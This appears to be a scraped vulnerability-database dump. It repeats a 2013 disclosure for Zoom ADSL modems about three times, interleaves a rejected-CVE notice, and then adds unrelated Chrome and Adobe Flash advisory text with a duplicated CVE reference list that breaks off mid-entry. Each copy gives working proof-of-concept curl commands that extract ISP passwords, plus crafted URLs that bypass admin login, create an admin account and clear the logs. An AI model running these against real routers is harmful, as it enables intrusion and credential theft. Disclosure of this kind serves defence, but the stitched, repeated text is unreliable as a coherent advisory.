usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: A public posting on 20130831 referenced this ID for a specific issue, but that issue had not been assigned this ID by any CNA. Notes: The posting will later have IDs assigned in accordance with CVE content decisions. Zoom X4 and X5 are ADSL router devices. Multiple Zoom Telephonics devices have information leaks, verification bypasses and SQL injection vulnerabilities that allow remote attackers to exploit these vulnerabilities to gain unauthorized access, obtain sensitive information, and modify and access device data. Multiple Zoom Telephonics devices are prone to an information-disclosure vulnerability, multiple authentication bypass vulnerabilities and an SQL-injection vulnerability. They were first reported on June 28th, 2013 and partial disclosure was made on July 9, 2013. ---------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------- Directory Traversal/Unauthenticated access to administrative panels CVSS Base Score 9.7 Impact Subscore 9.5 Temporal Score: 8.3 (AV:N/AC:L/Au:N/C:P/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-22: Improper Limitation of a Pathname to a Restricted Directory CVE-2013-5622 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5627 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5624 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X By simply placing the following two URLs into a web browser, a vulnerability will all models and firmware versions allow for bypass of administrative credential challenge. All models and firmware versions can access these pages with no authentication. An un-authenticated user can preform almost all administrative tasks once the authentication is bypassed. http://<IP>/hag/pages/toc.htm (--Menu Banner) http://<IP>/hag/pages/toolbox.htm (-Advanced Options Menu) ---------------------------------------------------------------------------------------------------------------- Improper handling of unexpected characters/data CVSS Base Score 8.3 Impact Subscore 8.5 Temporal Score: 6.7 (AV:N/AC:M/Au:N/C:P/I:P/A:C/E:POC/RL:W/RC:UR) CWE-241: Improper Handling of Unexpected Data Type CVE-2013-5623 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5628 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5631 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X CVE-2013-5632 - Zoom ADSL Bridge Modem Model 5715; all firmware versions CVE-2013-5633 - Zoom USB ADSL Modem Model 5510B; all firmware versions When an unexpected/illegal character is added to the end of any URL which calls a value, such as http://<IP>/MainPage?id=25' the browser will immediately redirect the browser to the "System Status" page without authentication, where links to each interface (i.e. eth-0,usb-0,etc) is both selectable whose properties can be edited. ---------------------------------------------------------------------------------------------------------------- Plain text storage of ISP/PPPoe usernames/passwords CVSS Base Score 6.8 Impact Subscore 6.4 Temporal Score: 8.6 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:POC/RL:W/RC:UR) CWE-311: Missing Encryption of Sensitive Data CVE-2013-5620 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.2 CVE-2013-5626 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X 3.0.X CVE-2013-5629 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X 3.0.X The following command will display the ISP usernames and passwords. (The print value may vary slightly based on firmware.) Proof of Concept curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanPasswd'|awk '{ print $8 }' value="wanpasswd1" ('or similar') curl -s http://<IP>/MainPage?id=25 |egrep -i 'MacWanUsrName'|awk '{ print $21 }' value="user@usersisp.net" ('or similar') ---------------------------------------------------------------------------------------------------------------- Unauthenticated direct execution of administrative tasks CVSS Base Score 10.0 Impact Subscore 10.0 Temporal Score: 8.6 (AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:W/RC:UR/CDP:H/TD:H/CR:ND/IR:ND/AR:ND) CWE-285: Improper Authorization CVE-2013-5621 - Zoom X3 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X CVE-2013-5625 - Zoom X4 ADSL Modem Firmware 1.0.X 2.0.X 2.1.X 2.5.X CVE-2013-5630 - Zoom X5 ADSL Modem Firmware 1.0.X 1.1.X 2.0.X 2.1.X 2.2.X 2.5.X Administrative authentication can be bypassed and commands directly executed with specially crafted commands. Proofs of Concept - Create New Acct Admin or Intermediate - (all PW and admin names are 'or similar') http://<IP>/hag/emweb/PopOutUserAdd.htm?id=70&user_id="newintermediateaccount"&priv=v2&pass1="123456"&pass2="123456"&cmdSubmit=Save+Changes Clear Logs http://<IP>/Action?id=76&cmdClear+Log=Clear+Log ---------------------------------------------------------------------------------------------------------------- Fixes/Patches: There are no known patches or fixes for these vulnerabilities at this time. Workaround: It is advised to turn off all remote administrative access to the router. This workaround however, will not prevent local attacks. ---------------------------------------------------------------------------------------------------------------- External Links http://www.osvdb.org/show/osvdb/95071 http://xforce.iss.net/xforce/xfdb/85612 http://www.idappcom.com/db/?7819 Vendor Links http://www.zoomtel.com/products/5715.html http://www.zoomtel.com/graphics/datasheets/adsl/USB_3104_5510B.pdf http://www.zoomtel.com/products/adsl_overview.html http://www.zoomtel.com/products/5760.html http://www.zoomtel.com/products/5751.html http://www.zoomtel.com/products/5754.html Discovered - 06-28-2013 Updated - 09/01/2013 Research Contact - K Lovett Affiliation - QuattroSG

Google Chrome before 28.0.1500.71 on Mac OS X does not ensure a sufficient source of entropy for renderer processes, which might make it easier for remote attackers to defeat cryptographic protection mechanisms in third-party components via unspecified vectors. Google Chrome is prone to a security vulnerability. The impact of this issue is currently unknown. We will update this BID as more information emerges. Versions prior to Chrome 28.0.1500.71 are vulnerable. NOTE: This issue was previously covered in BID 61041 (Google Chrome Prior to 28.0.1500.71 Multiple Security Vulnerabilities) but has been given its own record for better documentation. Google Chrome is a web browser developed by Google (Google). The vulnerability stems from the fact that the program does not determine an entropy value with sufficient resources for the renderer process. A remote attacker can exploit this vulnerability to crack the encryption protection mechanism through third-party components

Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the PCM processing code. By providing a malformed audio sample through ActionScript3, an attacker can cause an integer overflow. Adobe Flash Player is prone to an integer-overflow vulnerability. Note: This issue was previously covered in BID 61038 (Adobe Flash Player APSB13-17 Multiple Remote Code Execution Vulnerabilities), but has been moved to its own record for better documentation. Failed attempts will likely cause a denial-of-service condition. The product enables viewing of applications, content and video across screens and browsers. The vulnerability stems from the fact that the program does not correctly process the PCM data when resampling the PCM buffer provided by the user. It is also possible to take control of the affected system. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0648 [ 75 ] CVE-2013-0649 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0649 [ 76 ] CVE-2013-0650 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0650 [ 77 ] CVE-2013-1365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1365 [ 78 ] CVE-2013-1366 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1366 [ 79 ] CVE-2013-1367 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1367 [ 80 ] CVE-2013-1368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1368 [ 81 ] CVE-2013-1369 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1369 [ 82 ] CVE-2013-1370 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1370 [ 83 ] CVE-2013-1371 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1371 [ 84 ] CVE-2013-1372 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1372 [ 85 ] CVE-2013-1373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1373 [ 86 ] CVE-2013-1374 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1374 [ 87 ] CVE-2013-1375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1375 [ 88 ] CVE-2013-1378 